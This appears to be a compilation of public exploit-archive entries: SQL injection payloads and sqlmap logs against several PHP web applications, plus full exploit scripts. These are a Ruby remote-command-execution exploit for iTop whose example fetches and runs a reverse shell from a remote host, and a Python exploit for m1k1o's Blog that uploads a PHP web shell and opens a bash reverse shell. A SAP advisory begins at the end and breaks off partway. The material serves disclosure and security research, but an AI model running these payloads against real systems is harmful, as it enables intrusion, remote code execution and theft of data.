<pre><code>## Title: Online Fire Reporting System 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.24.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting<br /><br /><br /><br />## Description:<br />The `date` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'<br />was submitted in the `date` parameter.<br />The attacker can take administrator accounts control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: date (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=reports&date=2022-05-24'+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''<br />OR NOT 3052=3052 AND 'yrRg'='yrRg<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=reports&date=2022-05-24'+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''<br />AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT<br />(ELT(8940=8940,1))),0x7162767171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ATCs'='ATCs<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=reports&date=2022-05-24'+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''<br />AND (SELECT 9304 FROM (SELECT(SLEEP(5)))aaXF) AND 'lAbH'='lAbH<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: page=reports&date=2022-05-24'+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766b71,0x6d464b4556785048787241587a49795869777141684b4d5252784244626f77424b514675714f7349,0x7162767171),NULL,NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/znojdy)<br /><br /></code></pre>
<pre><code># Exploit Title: Multiple blind SQL injection vulnerabilities in in CLink Office 2.0 Anti-Spam management console <br /># Date: 30 Mar 2022 <br /># Exploit Author: Erwin Chan, Stephen Tsoi <br /># Vendor Homepage: https://www.communilink.net/ <br /># Softwar: CLink Office <br /># Version: 2.0 <br /># Tested on: CLink Office 2.0 Anti-Spam management console<br /><br />Vulnerability details below:<br /><br />Affected URL: /cgi-bin/anti-spam.pl<br />Affected Parameter: username, password<br />Payload example:<br />- boolean-based blind SQLi<br />* ' AND 1234=(SELECT (CASE WHEN (TRUE) THEN 1234 ELSE (SELECT 1111 UNION<br />SELECT 2222) END))-- LMgx*<br />*' AND 1234=(SELECT (CASE WHEN (FALSE) THEN 1234 ELSE (SELECT 1111 UNION<br />SELECT 2222) END))-- LMgx*<br />- time-based blind SQLi<br />*' OR SLEEP(5)-- LMgx*<br /><br />As a result, we were able to dump database data on application. I recommend<br />development team to perform input sanitization on affected parameters.<br />Please lets me know if you have any questions. Thanks.<br /><br /></code></pre>
<pre><code>#!/usr/bin/env ruby<br /><br /># Exploit<br />## Title: iTop < 2.7.6 - (Authenticated) Remote command execution<br />## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)<br />## Author website: https://pwn.by/noraj/<br />## Exploit source: https://github.com/Acceis/exploit-CVE-2022-24780<br />## Date: 2022-05-20<br />## Vendor Homepage: https://www.combodo.com/itop<br />## Software Link: https://github.com/Combodo/iTop/archive/refs/tags/2.7.5.tar.gz<br />## Version: 2.x < 2.7.6 and 3.x.x-beta < 3.0.0<br />## Tested on: iTop version 2.7.4 (Ubuntu 18.04.4 LTS - 7.3.28)<br /><br /># Vulnerability<br />## Discoverer: Markus KRELL<br />## Date: 2021-10-04<br />## Discoverer website: https://markus-krell.de/<br />## Discovered on iTop 2.7.4-7194 and 3.0.0-beta-7312<br />## Title: Server-Side Template Injection inside customer Portal<br />## CVE: CVE-2022-24780<br />## CWE: CWE-94, CWE-1336<br />## Patch:<br />## - https://github.com/Combodo/iTop/commit/b6fac4b411b8d145fc30fa35c66b51243eafd06b<br />## - https://github.com/Combodo/iTop/commit/eb2a615bd28100442c7f6171707bb40884af2305<br />## - https://github.com/Combodo/iTop/commit/93f273a28778e5da8e51096f021d2dc1adbf4ef3<br />## References:<br />## - https://nvd.nist.gov/vuln/detail/CVE-2022-24780<br />## - https://github.com/Combodo/iTop/security/advisories/GHSA-v97m-wgxq-rh54<br />## - https://markus-krell.de/itop-template-injection-inside-customer-portal/<br /><br />require 'httpx'<br />require 'docopt'<br />require 'nokogiri'<br /><br />doc = <<~DOCOPT<br /> iTop < 2.7.6 - (Authenticated) Remote command execution<br /><br /> Usage:<br /> #{__FILE__} full <url> <username> <password> <cmd> [--debug]<br /> #{__FILE__} light <url> <username> <password> <cmd> [--debug]<br /> #{__FILE__} -h | --help<br /><br /> full: exploit with an emulated browser, execute JavaScript, preserve original user profile information<br /> light: just parse HTML and send requests, no JavaScript, (DESTRUCTIVE) reset user information: phone, location, function<br /><br /> Options:<br /> <url> Root URL (base path) including HTTP scheme, port and root folder<br /> <username> iTop portal username<br /> <password> iTop portal user password<br /> <cmd> Command to execute on the target<br /> --debug Display arguments<br /> -h, --help Show this screen<br /><br /> Examples:<br /> #{__FILE__} full http://example.org john 's9nvEIZnEo6ghi' 'echo proof > /var/www/html/proof.txt'<br /> #{__FILE__} light https://example.org:5000/itop john 's9nvEIZnEo6ghi' 'curl --remote-name http://pentest.example.com:7000/revshell.pl; perl revshell.pl'<br />DOCOPT<br /><br /><br />def login(root_url, user, pass, http)<br /> login_url = "#{root_url}/pages/UI.php"<br /> params = {<br /> 'auth_user' => user,<br /> 'auth_pwd' => pass,<br /> 'login_mode' => 'form',<br /> 'loginop' => 'login'<br /> }<br /><br /> http.post(login_url, form: params).body.to_s<br />end<br /><br />def login_watir(root_url, user, pass, browser)<br /> login_url = "#{root_url}/pages/UI.php"<br /> browser.goto login_url<br /><br /> browser.text_field(id: 'user').set(user)<br /> browser.text_field(id: 'pwd').set(pass)<br /><br /> browser.button(value: 'Enter iTop').click<br />end<br /><br />def fetch_form(root_url, http)<br /> profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"<br /><br /> # Fetch and parse HTML document<br /> doc = Nokogiri.HTML5(http.get(profile_url).body.to_s)<br /> action = doc.css('form').first['action']<br /> transaction_id = doc.css('input[name="transaction_id"]').first['value']<br /> form_id = doc.css('form').first['id']<br /> # doesn't work because it's populated with javascript, we'll need watir for that<br /> #phone = doc.css('input[id^=field_phone]').first['value']<br /> #location = doc.css('select[id^=field_location_id] option[selected]').first['value']<br /> #function = doc.css('input[id^=field_function]').first['value']<br /> return {action: action, tid: transaction_id, fid: form_id}<br />end<br /><br />def exploit(root_url, cmd, http, browser)<br /> form_data = fetch_form(root_url, http)<br /> vuln_url = "#{root_url}#{form_data[:action]}"<br /> user_info = browser.nil? ? {phone: '', location: '', function: ''} : fetch_form_js(root_url, browser)<br /> params = {<br /> 'operation' => 'submit',<br /> 'stimulus_code' => '',<br /> 'transaction_id' => form_data[:tid],<br /> # source data already escapes backslashes and double quotes for JSON<br /> # so \ -> \\ and " -> \"<br /> # but we need to esacpe backslash once for Ruby too because we need an interpolated string<br /> # so \ -> \\ -> \\\\ and " -> \\"<br /> 'formmanager_class' => 'Combodo\iTop\Portal\Form\ObjectFormManager',<br /> 'formmanager_data' => %Q^{"id":"#{form_data[:fid]}","transaction_id":"#{form_data[:tid]}","formmanager_class":"Combodo\\\\iTop\\\\Portal\\\\Form\\\\ObjectFormManager","formrenderer_class":"Combodo\\\\iTop\\\\Renderer\\\\Bootstrap\\\\BsFormRenderer","formrenderer_endpoint":"#{form_data[:action]}","formobject_class":"Person","formobject_id":"1","formmode":"edit","formactionrulestoken":"","formproperties":{"id":"default-user-profile","type":"custom_list","fields":[],"layout":{"type":"twig","content":"<!-- data-field-id attribute must be an attribute code of the class --><!-- data-field-flags attribute contains flags among read_only/hidden/mandatory/must_prompt/must_change --><div class=\\"form_field\\" data-field-id=\\"first_name{{['#{cmd}']|filter('system')}}\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"name\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"org_id\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"email\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"phone\\"></div><div class=\\"form_field\\" data-field-id=\\"location_id\\"></div><div class=\\"form_field\\" data-field-id=\\"function\\"></div><div class=\\"form_field\\" data-field-id=\\"manager_id\\" data-field-flags=\\"read_only\\"></div>"}}}^,<br /> 'current_values[phone]' => user_info[:phone],<br /> 'current_values[location_id]' => user_info[:location],<br /> 'current_values[function]' => user_info[:function]<br /> }<br /><br /> http.post(vuln_url, form: params).body.to_s<br />end<br /><br />def fetch_form_js(root_url, browser)<br /> # those values can't be fetched with nokogiri alone sicne they are populated using javascript<br /> profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"<br /> browser.goto profile_url<br /> phone = browser.text_field(name: 'phone').value<br /> location = browser.select(name: 'location_id').selected_options.first.value<br /> function = browser.text_field(name: 'function').value<br /><br /> return {phone: phone, location: location, function: function}<br />end<br /><br />begin<br /> args = Docopt.docopt(doc)<br /> pp args if args['--debug']<br /><br /> http = HTTPX.plugin(:cookies)<br /> login(args['<url>'], args['<username>'], args['<password>'], http)<br /><br /> if args['full']<br /> require 'watir'<br /> require 'webdrivers'<br /><br /> b = Watir::Browser.new :firefox<br /> login_watir(args['<url>'], args['<username>'], args['<password>'], b)<br /> elsif args['light']<br /> b = nil<br /> end<br /><br /> exploit(args['<url>'], args['<cmd>'], http, b)<br />rescue Docopt::Exit => e<br /> puts e.message<br />end<br /></code></pre>
<pre><code># Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-01-06<br /># Exploit Author: Malte V<br /># Vendor Homepage: https://github.com/m1k1o/blog<br /># Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip<br /># Version: 1.3 and below<br /># Tested on: Linux<br /># CVE : CVE-2022-23626<br /><br />import argparse<br />import json<br />import re<br />from base64 import b64encode<br />import requests as req<br />from bs4 import BeautifulSoup<br /><br />parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')<br />parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)<br />parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',<br /> required=False)<br />parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,<br /> required=False)<br />parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,<br /> required=False)<br />parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)<br />parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)<br /><br />args = vars(parser.parse_args())<br /><br />username = args['username']<br />password = args['password']<br />lhost_ip = args['ip']<br />lhost_port = args['lport']<br />address = args['url']<br />port = args['port']<br />url = f"http://{address}:{port}"<br /><br />blog_cookie = ""<br />csrf_token = ""<br />exploit_file_name = ""<br />header = {<br /> "Host": f"{address}",<br /> "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Csrf-Token": f"{csrf_token}",<br /> "Cookie": f"PHPSESSID={blog_cookie}"<br />}<br /><br /><br />def get_cookie(complete_url):<br /> global blog_cookie<br /> cookie_header = {}<br /> if not blog_cookie:<br /> cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"<br /> result = req.get(url=complete_url, headers=cookie_header)<br /> if result.status_code == 200:<br /> blog_cookie = result.cookies.get_dict()['PHPSESSID']<br /> print(f'[+] Found PHPSESSID: {blog_cookie}')<br /> grep_csrf(result)<br /><br /><br />def grep_csrf(result):<br /> global csrf_token<br /> csrf_regex = r"[a-f0-9]{10}"<br /> soup = BeautifulSoup(result.text, 'html.parser')<br /> script_tag = str(soup.findAll('script')[1].contents[0])<br /> csrf_token = re.search(csrf_regex, script_tag).group(0)<br /> print(f'[+] Found CSRF-Token: {csrf_token}')<br /><br /><br />def login(username, password):<br /> get_cookie(url)<br /> login_url = f"{url}/ajax.php"<br /> login_data = f"action=login&nick={username}&pass={password}"<br /> login_header = {<br /> "Host": f"{address}",<br /> "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Csrf-Token": f"{csrf_token}",<br /> "Cookie": f"PHPSESSID={blog_cookie}"<br /> }<br /> result = req.post(url=login_url, headers=login_header, data=login_data)<br /> soup = BeautifulSoup(result.text, 'html.parser')<br /> login_content = json.loads(soup.text)<br /> if login_content.get('logged_in'):<br /> print('[*] Successful login')<br /> else:<br /> print('[!] Bad login')<br /><br /><br />def set_cookie(result):<br /> global blog_cookie<br /> blog_cookie = result.cookies.get_dict()['PHPSESSID']<br /><br /><br />def generate_payload(command):<br /> return f"""<br />-----------------------------13148889121752486353560141292<br />Content-Disposition: form-data; name="file"; filename="malicious.gif.php"<br />Content-Type: application/x-httpd-php<br /><br />GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;<br />-----------------------------13148889121752486353560141292--<br />"""<br /><br /><br />def send_payload():<br /> payload_header = {<br /> "Host": f"{address}",<br /> "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Csrf-Token": f"{csrf_token}",<br /> "Cookie": f"PHPSESSID={blog_cookie}"<br /> }<br /> upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"<br /> command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"<br /> payload = generate_payload(command)<br /> print(f"[+] Upload exploit")<br /> result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})<br /> set_exploit_file_name(result.content.decode('ascii'))<br /><br /><br />def set_exploit_file_name(data):<br /> global exploit_file_name<br /> file_regex = r"[a-zA-Z0-9]{4,5}.php"<br /> exploit_file_name = re.search(file_regex, data).group(0)<br /><br /><br />def call_malicious_php(file_name):<br /> global header<br /> complete_url = f"{url}/data/i/{file_name}"<br /> print('[*] Calling reverse shell')<br /> result = req.get(url=complete_url)<br /><br /><br />def check_reverse_shell():<br /> yes = {'yes', 'y', 'ye', ''}<br /> no = {'no', 'n'}<br /> choice = input("Have you got an active netcat listener (y/Y or n/N): ")<br /> if choice in yes:<br /> return True<br /> elif choice in no:<br /> print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")<br /> return False<br /><br />def main():<br /> enabled_listener = check_reverse_shell()<br /> if enabled_listener:<br /> login(username, password)<br /> send_payload()<br /> call_malicious_php(exploit_file_name)<br /><br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code># Information<br />```<br />Vulnerability Name : Remote Blind SQL Injections in Inout Blockchain FiatExchanger<br />Product : Inout Blockchain FiatExchanger<br />version : 2.2.1<br />Date : 2022-05-21<br />Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/<br />Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md<br />CVE-Number : In Progess<br />Exploit Author : Mohamed N. Ali @MohamedNab1l<br />```<br /><br><br /><br /># Description<br /><br><br /><br />SQL injection attack has been discovered in Blockchain FiatExchanger v2.2.1 platform. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.<br /><br><br /><br />## Vulnerable Parameter: symbol (GET)<br /><br /><br><br /><br />Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php line 130<br /><br /><br><br /><br />### Sqlmap command:<br />`<br />python sqlmap.py -u "http://http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user<br /><br />`<br /><br><br /><br />### output:<br />`<br />[20:05:54] [INFO] fetched random HTTP User-Agent header value 'Opera/9.20(Windows NT 5.1; U; en)' from file '/root/sqlmap/data/txt/user-agents.txt'<br />[20:05:55] [INFO] testing connection to the target URL<br />[20:05:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests<br />sqlmap resumed the following injection point(s) from stored session:<br /><br />Parameter: symbol (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB<br /><br />[20:05:55] [INFO] testing MySQL<br />[20:05:56] [INFO] confirming MySQL<br />[20:05:57] [INFO] the back-end DBMS is MySQL<br />[20:05:57] [INFO] fetching banner<br />[20:05:57] [INFO] resumed: '5.6.50'<br />web application technology: PHP 7.0.33<br />back-end DBMS: MySQL >= 5.0.0<br />banner: '5.6.50'<br />[20:05:57] [INFO] fetching current user<br />[20:05:57] [INFO] retrieved: 'root@localhost'<br />current user: 'root@localhost'<br />[20:05:57] [INFO] fetching current database<br />[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'<br />current database: 'inout_blockchain_fiatexchanger_db'<br />[20:05:57] [INFO] fetching database names<br />[20:05:57] [INFO] resumed: 'information_schema'<br />[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db'<br />[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db'<br />[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'<br />[20:05:57] [INFO] resumed: 'mysql'<br />[20:05:57] [INFO] resumed: 'performance_schema'<br />available databases [6]:<br />[*] information_schema<br />[*] inout_blockchain_fiatexchanger_addons_db<br />[*] inout_blockchain_fiatexchanger_cryptotrading_db<br />[*] inout_blockchain_fiatexchanger_db<br />[*] mysql<br />[*] performance_schema<br /><br />`<br /><br><br /><img src="./resources/Blockchain-FiatExchanger-221-sqlmap1.png"><br /><br><br /><img src="./resources/Blockchain-FiatExchanger-221-sqlmap2.png"><br /><br><br /><br /><br />## Timeline<br />```<br />2022-05-03: Discovered the bug<br />2022-05-03: Reported to vendor<br />2022-05-21: Advisory published<br />```<br /><br /><br><br /><br />## Discovered by<br />```<br />Mohamed N. Ali<br />@MohamedNab1l<br />ali.mohamed@gmail.com<br /><br />```<br /></code></pre>
<pre><code># Information<br />```<br />Vulnerability Name : Multiple Remote SQL Injections in Inout Blockchain AltExchanger<br />Product : Inout Blockchain AltExchanger<br />version : 1.2.1<br />Date : 2022-05-21<br />Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/<br />Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.md<br />CVE-Number : In Progess<br />Exploit Author : Mohamed N. Ali @MohamedNab1l<br />```<br /><br><br /><br /># Description<br /><br><br /><br />Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.<br /><br><br /><br />## 1- Vulnerable Parameter: symbol (GET)<br /><br /><br><br /><br />Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php<br /><br /><br><br /><br />### Sqlmap command:<br />`<br />python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db<br />`<br /><br><br /><br />### output:<br />`<br />Parameter: symbol (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO<br />[16:43:22] [INFO] testing MySQL<br />[16:43:23] [INFO] confirming MySQL<br />[16:43:26] [INFO] the back-end DBMS is MySQL<br />[16:43:26] [INFO] fetching banner<br />[16:43:26] [INFO] resumed: 5.6.50<br />web application technology: PHP 7.0.33<br />back-end DBMS: MySQL >= 5.0.0<br />banner: '5.6.50'<br />[16:43:26] [INFO] fetching current database<br />[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_db<br />current database: 'inout_blockchain_altexchanger_db'<br />`<br /><br><br /><img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"><br /><br><br /><br />## 2- Vulnerable Parameter: marketcurrency (POST)<br /><br /><br><br /><br />Vulnerability File: /index.php/coins/update_marketboxslider<br /><br /><br><br /><br />### HTTP Request:<br />----------------------------------------------------<br />`<br />POST /index.php/coins/update_marketboxslider HTTP/1.1<br />Content-Type: application/x-www-form-urlencoded<br />X-Requested-With: XMLHttpRequest<br />Referer: http://vulnerable-host.com/<br />Cookie: inoutio_language=4<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate,br<br />Content-Length: 69<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36<br />Host: vulnerable-host.com<br />Connection: Keep-alive<br />displaylimit=4&marketcurrency=-INJEQT-SQL-HERE<br />`<br />----------------------------------------------------<br /><br /><br><br /><br />## 3- Vulnerable Parameter: Cookie: inoutio_language (GET)<br /><br /><br><br /><br />Vulnerability File: /index.php<br /><br /><br><br /><br />### HTTP Request:<br />----------------------------------------------------<br />`<br />GET /index.php/home/about HTTP/1.1<br />Referer: https://www.google.com/search?hl=en&q=testing<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36<br />x-requested-with: XMLHttpRequest<br />Cookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate,br<br />Host: vulnerable-host.com<br />Connection: Keep-alive<br />`<br />----------------------------------------------------<br /><br /><br><br /><br />## Timeline<br />```<br />2022-05-03: Discovered the bug<br />2022-05-03: Reported to vendor<br />2022-05-21: Advisory published<br />```<br /><br /><br><br /><br />## Discovered by<br />```<br />Mohamed N. Ali<br />@MohamedNab1l<br />ali.mohamed at gmail.com<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi<br /># Date: 19/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.opencart.com/<br /># Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez<br /># Version: v.3.0.2.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br />* Description :<br /><br />Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. <br />Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.<br /><br /><br />* Steps to Reproduce :<br />- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter<br />- Save request in BurpSuite<br />- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs<br /><br /><br /><br />Request :<br /><br />===========<br /><br />POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1<br />Content-Type: application/x-www-form-urlencoded<br />Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate<br />Content-Length: 29<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0<br />Connection: Keep-alive<br /><br />zemez_newsletter_email=saud<br /><br /><br />===========<br /><br />Output :<br /><br />Parameter: zemez_newsletter_email (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK<br /> <br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220518-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: SAP® Application Server<br /> ABAP and ABAP® Platform (Different Software Components)<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security notes 2958563, 2973735,<br /> 2993132, 2986980, 2999854, 3002517, 3048657<br /> CVE number: CVE-2020-6318, CVE-2020-26808, CVE-2020-26832,<br /> CVE-2021-21465, CVE-2021-21468, CVE-2021-21466,<br /> CVE-2021-21473, CVE-2021-33678<br /> impact: critical<br /> homepage: https://www.sap.com<br /> found: 08/2020 - 02/2021<br /> by: Fabian Hagg (Office Vienna)<br /> Alexander Meier (Office Berlin)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP is a market share leader in enterprise resource planning (ERP),<br />analytics, supply chain management, human capital management, master<br />data management, data integration as well as in experience management"<br />[1]. Customers comprise 92% of the Forbes Global 2000 companies and<br />98% of the 100 most valued brands. 77% of the world’s transaction revenue<br />touches an SAP system [1, 2].<br /><br />"SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on<br />which important business processes run. It provides a complete development<br />and runtime environment for ABAP-based applications. The purpose of AS ABAP<br />is to provide programmers with an efficient means of expressing business<br />logic and relieve them from the necessity of platform-related and purely<br />technical coding. AS ABAP is therefore a basis for all ABAP systems" [3].<br /><br />"The [successor] ABAP platform provides a reliable and scalable server<br />and programming environment for modern ABAP development [...]. The ABAP<br />platform offers support for SAP HANA and SAP Fiori and allows developers<br />to efficiently build enterprise software that meets the requirements of<br />their business scenarios – on-premise as well as in the cloud" [4].<br /><br />[1] https://www.sap.com/about/company.html<br />[2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71<br /> af511fa.html<br />[3] 